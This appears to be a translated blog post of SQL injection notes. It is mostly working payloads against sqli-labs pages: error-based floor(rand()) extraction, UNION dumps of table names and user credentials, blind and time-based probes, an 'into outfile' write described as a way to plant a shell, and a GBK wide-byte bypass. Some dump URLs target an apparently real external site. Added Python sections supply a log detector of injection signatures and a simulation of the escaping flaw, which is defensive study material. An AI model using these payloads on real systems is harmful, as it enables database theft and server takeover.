Web Security: SQL Injection

Prerequisite
The user can reach and modify the content that is sent to the server.
Probing via the URL
and 1=1 / and 1=2   judge from the returned content: numeric type
'   same as above: string type
-1 / +1   echoes the previous record: numeric type
and sleep(12)   response time

Principle
Types and techniques
Detection methods

Everything below assumes ideal conditions...
Error-based: floor
The floor method

mysql> select concat((select database()));
mysql> select concat((select database()),0x3a);
mysql> select concat((select database()),0x3a,floor(rand()*2));
mysql> select concat((select database()),0x3a,floor(rand()*2)) a;
mysql> select concat((select database()),0x3a,floor(rand()*2)) a from information_schema;
mysql> select concat((select database()),0x3a,floor(rand()*2)) a from information_schema.tables;
mysql> select concat((select database()),0x3a,floor(rand()*2)) a from information_schema.tables group by a;
mysql> select count(*),concat((select database()),0x3a,floor(rand()*2)) a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry ':security:1' for key 'group_key'

The error returned by the statement reveals the database, user, version, host type and similar information.
Number of databases:

http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=1'+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

Database:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1' UNION SELECT 1,count(*),concat(0x3a,(select database()),0x3a,floor (rand()*2)) a from information_schema.tables group by a-- +

Tables:

http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1' UNION SELECT 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 1,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a-- +

Columns:

http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1' UNION SELECT 1,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a-- +

Data:

http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1' UNION SELECT 1,count(*),concat((select concat_ws(0x3a,username,password) from users limit 1,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a-- +

PS: changing the limit value selects a different user, table name, etc. Applies to MySQL 5.x.

File export can also be used (when the current MySQL user has file privileges).
Database:

http://127.0.0.1/ctf/sqli-labs/Less-7/index.php
?id=1')) UNION SELECT 1,database(),3 into outfile "D:/Wamp/www/ctf/sqli-labs/Less-7/tests.txt" --+

This is also how a shell gets written. The exported file cannot overwrite an existing one, so export the whole query in one go.

Blind injection: suits MySQL below 5.x and statements where error output is suppressed.
Determine the version:

http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and substr(version(),1,1)=5--+ # a normal response means MySQL 5.x

Database:

http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and (length(database()))=8--+ # test the length of the database name
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and ascii(substr(database(),1,1))>110--+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and ascii(substr(database(),1,1))<116--+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and ascii(substr(database(),1,1))=115--+ # the first letter is s
Work out the database name character by character from the page response.
Table names:

http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and (select length(table_name)> from information_schema.tables where table_schema=database() limit 0,1) --+ # true
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and (select length(table_name)>7 from information_schema.tables where table_schema=database() limit 0,1) --+ # false
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and (select length(table_name)=6 from information_schema.tables where table_schema=database() limit 0,1) --+ # true: the first table name has length 6
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and ascii((select table_name from information_schema.tables where table_schema=database() limit 0,1))=101 --+ # ascii('e')=101
Change the limit value to test each table name in turn.
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and (select length(column_name)>4 from information_schema.columns where table_name limit 0,1) --+

Repeat the same steps to guess the column names.

The above only works on MySQL 5.x and where the information_schema database is readable.
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and (length(database()))=8--+ # test the length of the database name
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and ascii(substr(database(),1,1))>110--+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and ascii(substr(database(),2,1))<116--+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and ascii(substr(database(),3,1))=115--+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1' and exists(select * from users) --+ # judge existence from the page response, trying common table names
Time-based blind injection (sleep method)

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(schema_name)from information_schema.schemata),…,x   dump databases

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema='数据库名字'),…,x   dump tables

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='表名'),…,x   dump columns

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(user,pass)from 表名 ),…,x   dump data
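Every payload family above (boolean and 1=1/1=2 probes, sleep, union select, floor(rand()) error-based, information_schema reads, into outfile) leaves a recognisable trace in the web server access log. As an added example that is not part of the original post, here is a small Python detector run over constructed access-log lines modelled on the sqli-labs requests quoted above; the signatures, the log lines and the IP addresses are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# One signature per injection family seen in the notes above (patterns constructed for this example).
# Matching runs on normalised text (decoded, lower-cased, whitespace folded), so no re.I is needed.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band \d+ ?= ?\d+"),
    "time_based":    re.compile(r"\bsleep ?\("),
    "union_based":   re.compile(r"\bunion (all )?select\b"),
    "error_floor":   re.compile(r"floor ?\( ?rand ?\("),
    "schema_read":   re.compile(r"information_schema\."),
    "file_write":    re.compile(r"\binto (out|dump)file\b"),
    "blind_char":    re.compile(r"\b(ascii|substr|length) ?\("),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalise(url: str) -> str:
    """Undo percent-encoding twice (catches double encoding) and '+' spaces, drop /* */ comments."""
    text = unquote_plus(unquote_plus(url))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(url: str) -> set:
    """Return the names of all signatures that match the normalised request URL."""
    text = normalise(url)
    return {name for name, rx in SIGNATURES.items() if rx.search(text)}

def scan(log_lines):
    """Return (client_ip, sorted hit names) for every log line whose request matches a signature."""
    alerts = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m:
            hits = classify(m.group(1))
            if hits:
                alerts.append((line.split(" ", 1)[0], sorted(hits)))
    return alerts

# Constructed access-log lines: one benign request, then three modelled on the payloads above.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /Less-8/index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /Less-8/index.php?id=1%27+and+1%3D2--+ HTTP/1.1" 200 431',
    '10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /Less-8/index.php?id=1%27+and+sleep(12)--+ HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /Less-5/index.php?id=-1%27+UNION+SELECT+1,count(*),'
    'concat(0x3a,(select+database()),0x3a,floor(rand()*2))+a+from+information_schema.tables+group+by+a--+ HTTP/1.1" 500 118',
]

if __name__ == "__main__":
    for ip, hits in scan(LOG_LINES):
        print(ip, hits)
```

A single boolean hit from one client is weak evidence on its own; several families from the same IP within seconds, or a 500 on a union/floor request, is the pattern worth alerting on.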

Wide-byte injection
Prerequisite: GBK encoding
The wide-byte injection most commonly seen in China relies on GBK encoding. The technique bypasses functions such as addslashes that escape special characters. The backslash \ is %5c in hexadecimal. When you send %bf%27, the function meets the single quote and automatically inserts an escaping \, giving %bf%5c%27; in GBK, %bf%5c is read as the single wide character "縗", so the quote that follows is left unescaped. The byte in the %bf position can be anything from %81 to %fe.
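The byte sequence the paragraph describes can be replayed without a database. As an added example that is not from the original post, the Python below simulates a byte-oriented addslashes()-style escaper, decodes the result as a GBK connection would, and contrasts it with escaping done after decoding; the helper names are my own and the 0xbf byte is the constructed input from the text.

```python
# Added example: what a GBK connection sees when a byte-oriented escaper such as
# PHP addslashes() runs before the bytes are decoded (the case described above).

def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP addslashes(): backslash before ' \" \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def has_unescaped_quote(text: str) -> bool:
    """True if a single quote appears that is not preceded by an escaping backslash."""
    escaped = False
    for ch in text:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == "'":
            return True
    return False

def escape_bytes_then_decode(raw: bytes) -> str:
    """Vulnerable order: escape the raw bytes, then let the GBK connection decode them.
    %bf%5c is consumed as one two-byte character, so the quote survives unescaped."""
    return addslashes(raw).decode("gbk", errors="replace")

def decode_then_escape(raw: bytes) -> str:
    """Consistent order: decode with the connection charset first, then escape the text.
    A lone %bf cannot pair with the quote byte, so the quote receives its backslash."""
    text = raw.decode("gbk", errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

if __name__ == "__main__":
    payload = b"\xbf'"  # the %bf%27 input from the paragraph above (constructed)
    for fn in (escape_bytes_then_decode, decode_then_escape):
        result = fn(payload)
        print(fn.__name__, repr(result), "unescaped quote:", has_unescaped_quote(result))
```

Parameterised queries remove the problem entirely, since the value never reaches the SQL parser as text; where escaping is unavoidable, the escaper must know the connection charset (in PHP, mysql_set_charset rather than a charset set by query).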
